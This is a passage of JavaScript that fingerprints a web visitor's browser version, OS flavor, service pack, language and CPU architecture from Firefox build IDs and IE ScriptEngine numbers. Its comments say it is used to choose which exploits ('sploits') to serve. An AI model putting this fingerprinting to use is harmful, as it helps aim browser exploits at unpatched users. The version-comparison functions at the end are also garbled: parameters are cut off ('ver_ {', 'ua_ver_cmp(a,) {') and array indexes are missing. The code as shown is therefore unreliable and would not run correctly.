break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch) case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala) case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000 case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch) case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch) case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala) case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala) case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20120312181643": // It is disconcerting that a buildID is the same on Windows // and Mac, need to examine more versions on Mac. ua_version = "11.0"; if (/Mac/.test(navigator.oscpu)) { os_name = oses_mac_osx; } else { os_name = oses_windows; // browsershots: Firefox 11.0 / Windows XP } break; case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch) case "20120423142301": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20120424151700": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Fedora"; break; default: version = this.searchVersion("Firefox", navigator.userAgent); // Verify whether the ua string is lying by checking if it contains // the major version we detected using known objects above. If it // appears to be truthful, then use its more precise version number. if (version && version.split(".")[0] == ua_version.split(".")[0]) { // The version number will sometimes end with a space or end of // line, so strip off anything after a space if one exists if (-1 != version.indexOf(" ")) { version = version.substr(0,version.indexOf(" ")); } ua_version = version; } else { ua_is_lying = true; } break; } //if (ua_is_lying) { alert("UA is lying"); } //alert(ua_version + " vs " + navigator.userAgent); // end navigator.buildID checks } else if (typeof ScriptEngineMajorVersion == "function") { // Then this is IE and we can very reliably detect the OS. // Need to add detection for IE on Mac. Low priority, since we // don't have any sploits for it yet and it's a very low market // share. os_name = oses_windows; ua_name = clients_ie; version = ScriptEngineMajorVersion().toString(); version += ScriptEngineMinorVersion().toString(); version += ScriptEngineBuildVersion().toString(); //document.write("ScriptEngine: "+version+"<br />"); switch (version){ case "514615": // IE 5.00.2920.0000, 2000 Advanced Server SP0 English ua_version = "5.0"; os_flavor = "2000"; os_sp = "SP0"; break; case "515907": os_flavor = "2000"; os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109 break; case "518513": os_flavor = "2000"; os_sp = "SP4"; break; case "566626": // IE 6.0.2600.0000, XP SP0 English // IE 6.0.2800.1106, XP SP1 English ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP0"; break; case "568515": // IE 6.0.3790.0, 2003 Standard SP0 English ua_version = "6.0"; os_flavor = "2003"; os_sp = "SP0"; break; case "568820": // IE 6.0.2900.2180, xp sp2 english os_flavor = "XP"; os_sp = "SP2"; break; case "568827": os_flavor = "2003"; os_sp = "SP1"; break; case "568831": //XP SP2 -OR- 2K SP4 if (os_flavor == "2000"){ os_sp = "SP4"; } else{ os_flavor = "XP"; os_sp = "SP2"; } break; case "568832": os_flavor = "2003"; os_sp = "SP2"; break; case "568837": // IE 6.0.2900.2180, XP Professional SP2 Korean ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP2"; break; case "5716599": // IE 7.0.5730.13, XP Professional SP3 English // IE 6.0.2900.5512, XP Professional SP3 English // IE 6.0.2900.5512, XP Professional SP3 Spanish // // Since this scriptengine applies to more than one major version of // IE, rely on the object detection below to determine ua_version. //ua_version = "6.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "575730": // IE 7.0.5730.13, Server 2003 Standard SP2 English // IE 7.0.5730.13, Server 2003 Standard SP1 English // IE 7.0.5730.13, XP Professional SP2 English // Rely on the user agent matching above to determine the OS. // This will incorrectly identify 2k3 SP1 as SP2 ua_version = "7.0"; os_sp = "SP2"; break; case "5718066": // IE 7.0.5730.13, XP Professional SP3 English ua_version = "7.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "5722589": // IE 7.0.5730.13, XP Professional SP3 English ua_version = "7.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "576000": // IE 7.0.6000.16386, Vista Ultimate SP0 English ua_version = "7.0"; os_flavor = "Vista"; os_sp = "SP0"; break; case "580": // IE 8.0.7100.0, Windows 7 English // IE 8.0.7100.0, Windows 7 64-bit English case "5816385": // IE 8.0.7600.16385, Windows 7 English case "5816475": case "5816762": // IE 8.0.7600.16385, Windows 7 English ua_version = "8.0"; os_flavor = "7"; os_sp = "SP0"; break; case "5817514": // IE 8.0.7600.17514, Windows 7 SP1 English ua_version = "8.0"; os_flavor = "7"; os_sp = "SP1"; break; case "5818702": // IE 8.0.6001.18702, XP Professional SP3 English case "5822960": // IE 8.0.6001.18702, XP Professional SP3 Greek ua_version = "8.0"; os_flavor = "XP"; os_sp = "SP3"; break; case "9016406": // IE 9.0.7930.16406, Windows 7 64-bit ua_version = "9.0"; os_flavor = "7"; os_sp = "SP0"; break; case "9016441": // IE 9.0.8112.16421, Windows 7 32-bit English ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016443": // IE 9.0.8112.16421, Windows 7 Polish // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016446": // IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988) // Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2) ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016464": // browsershots.org, MSIE 7.0 / Windows 2008 R2 os_flavor = "2008R2"; ua_version = "9.0"; break; case "9016470": // IE 9.0.8112.16421 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016502": // IE 9.0.8112.16502 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016506": // IE 9.0.8112.16506 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016514": // IE 9.0.8112.16514 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016520": // IE 9.0.8112.16520 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016526": // IE 9.0.8112.16526 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "9016533": // IE 9.0.8112.16533 / Windows 7 SP1 ua_version = "9.0"; os_flavor = "7"; os_sp = "SP1"; break; case "10016720": // IE 10.0.9200.16721 / Windows 7 SP1 ua_version = "10.0"; os_flavor = "7"; os_sp = "SP1"; break; case "11016428": // IE 11.0.9600.16428 / Windows 7 SP1 ua_version = "11.0"; os_flavor = "7"; os_sp = "SP1"; break; case "10016384": // IE 10.0.9200.16384 / Windows 8 x86 ua_version = "10.0"; os_flavor = "8"; os_sp = "SP0"; break; case "1000": // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release ua_version = "10.0"; os_flavor = "8"; os_sp = "SP0"; break; default: unknown_fingerprint = version; break; } if (!ua_version) { // The ScriptEngine functions failed us, try some object detection if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") { // IE 11 detection, see: Compatibility changes in IE11 (Windows) try { if (document.__proto__ != undefined) { ua_version = "11.0"; } } catch (e) {} // IE 10 detection using nodeName if (!ua_version) { try { var badNode = document.createElement && document.createElement("badname"); if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; } } catch(e) {} } // IE 9 detection based on a "Object doesn't support property or method" error if (!ua_version) { try { document.BADNAME(); } catch(e) { if (e.message.indexOf("BADNAME") > 0) { ua_version = "9.0"; } } } // IE8 detection straight from IEBlog. Thank you Microsoft. if (!ua_version) { try { ua_version = "8.0"; document.documentElement.style.display = "table-cell"; } catch(e) { // This executes in IE7, // but not IE8, regardless of mode ua_version = "7.0"; } } } else if (document.compatMode) { ua_version = "6.0"; } else if (window.createPopup) { ua_version = "5.5"; } else if (window.attachEvent) { ua_version = "5.0"; } else { ua_version = "4.0"; } switch (navigator.appMinorVersion){ case ";SP2;": ua_version += ";SP2"; break; } } } if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; } //-- // Flavor //-- if (!ua_is_lying) { version = useragent.toLowerCase(); } else if (navigator.oscpu) { // Then this is Gecko and we can get at least os_name without the // useragent version = navigator.oscpu.toLowerCase(); } else { // All we have left is the useragent and we know it's lying, so don't bother version = " "; } if (!os_name || 0 == os_name.length) { if (version.indexOf("windows") != -1) { os_name = oses_windows; } else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; } else if (version.indexOf("linux") != -1) { os_name = oses_linux; } } if (os_name == oses_windows && (!os_flavor || 0 == os_flavor.length)) { if (version.indexOf("windows 95") != -1) { os_flavor = "95"; } else if (version.indexOf("windows nt 4") != -1) { os_flavor = "NT"; } else if (version.indexOf("win 9x 4.9") != -1) { os_flavor = "ME"; } else if (version.indexOf("windows 98") != -1) { os_flavor = "98"; } else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000"; } else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP"; } else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; } else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; } else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; } else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; } } if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) { if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; } else if (version.indexOf("ubuntu") != -1) { os_flavor = "Ubuntu"; } else if (version.indexOf("debian") != -1) { os_flavor = "Debian"; } else if (version.indexOf("rhel") != -1) { os_flavor = "RHEL"; } else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL"; } else if (version.indexOf("centos") != -1) { os_flavor = "CentOS"; } else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; } else if (version.indexOf("android") != -1) { os_flavor = "Android"; } } //-- // Language //-- if (navigator.systemLanguage) { // ie os_lang = navigator.systemLanguage; } else if (navigator.language) { // gecko derivatives, safari, opera os_lang = navigator.language; } else { // some other browser and we don't know how to get the language, so // just guess english os_lang = "en"; } //-- // Architecture //-- if (typeof(navigator.cpuClass) != 'undefined') { // Then this is IE or Opera9+ and we can grab the arch directly switch (navigator.cpuClass) { case "x86": arch = arch_x86; break; case "x64": arch = arch_x86_64; break; } } if (!arch || 0 == arch.length) { // We don't have the handy-dandy navagator.cpuClass, so infer from // platform version = navigator.platform; //document.write(version + "\\n"); // IE 8 does a bit of wacky user-agent switching for "Compatibility View"; // 64-bit client on Windows 7, 64-bit: // Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) // 32-bit client on Windows 7, 64-bit: // Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) // 32-bit client on Vista, 32-bit, "Compatibility View": // Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) // // Report 32-bit client on 64-bit OS as being 32 because exploits will // need to know the bittedness of the process, not the OS. if ( ("Win32" == version) || (version.match(/i.86/)) ) { arch = arch_x86; } else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64'))) { arch = arch_x86_64; } else if (-1 != version.indexOf('PPC')) { arch = arch_ppc; } } this.ua_is_lying = ua_is_lying; this.os_name = os_name; this.os_flavor = os_flavor; this.os_sp = os_sp; this.os_lang = os_lang; this.arch = arch; this.ua_name = ua_name; this.ua_version = ua_version; this.ua_version = ua_version; return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version }; }; // function getVersion window.os_detect.searchVersion = function(needle, haystack) { var index = haystack.indexOf(needle); var found_version; if (index == -1) { return; } found_version = haystack.substring(index+needle.length+1); if (found_version.indexOf(' ') != -1) { // Strip off any junk at the end such as a CLR declaration found_version = found_version.substring(0,found_version.indexOf(' ')); } return found_version; }; /* * Return -1 if a < b, 0 if a == b, 1 if a > b */ window.ua_ver_cmp = function(ver_a, ver_ { // shortcut the easy case if (ver_a == ver_ { return 0; } a = ver_a.split("."); b = ver_b.split("."); for (var i = 0; i < Math.max(a.length, b.length); i++) { // 3.0 == 3 if (!b) { b = "0"; } if (!a) { a = "0"; } if (a == b) { continue; } a_int = parseInt(a); b_int = parseInt(b); a_rest = a.substr(a_int.toString().length); b_rest = b.substr(b_int.toString().length); if (a_int < b_int) { return -1; } else if (a_int > b_int) { return 1; } else { // == // Then we need to deal with the stuff after the ints, e.g.: // "b4pre" if (a_rest == "b" && b_rest.length == 0) { return -1; } if (b_rest == "b" && a_rest.length == 0) { return 1; } // Just give up and try a lexicographical comparison if (a_rest < b_rest) { return -1; } else if (a_rest > b_rest) { return 1; } } } // If we get here, they must be equal return 0; }; window.ua_ver_lt = function(a, { if (-1 == this.ua_ver_cmp(a,) { return true; } return false; }; window.ua_ver_gt = function(a, { if (1 == this.ua_ver_cmp(a,) { return true; } return false; }; window.ua_ver_eq = function(a, { if (0 == this.ua_ver_cmp(a,) { return true; } return false; };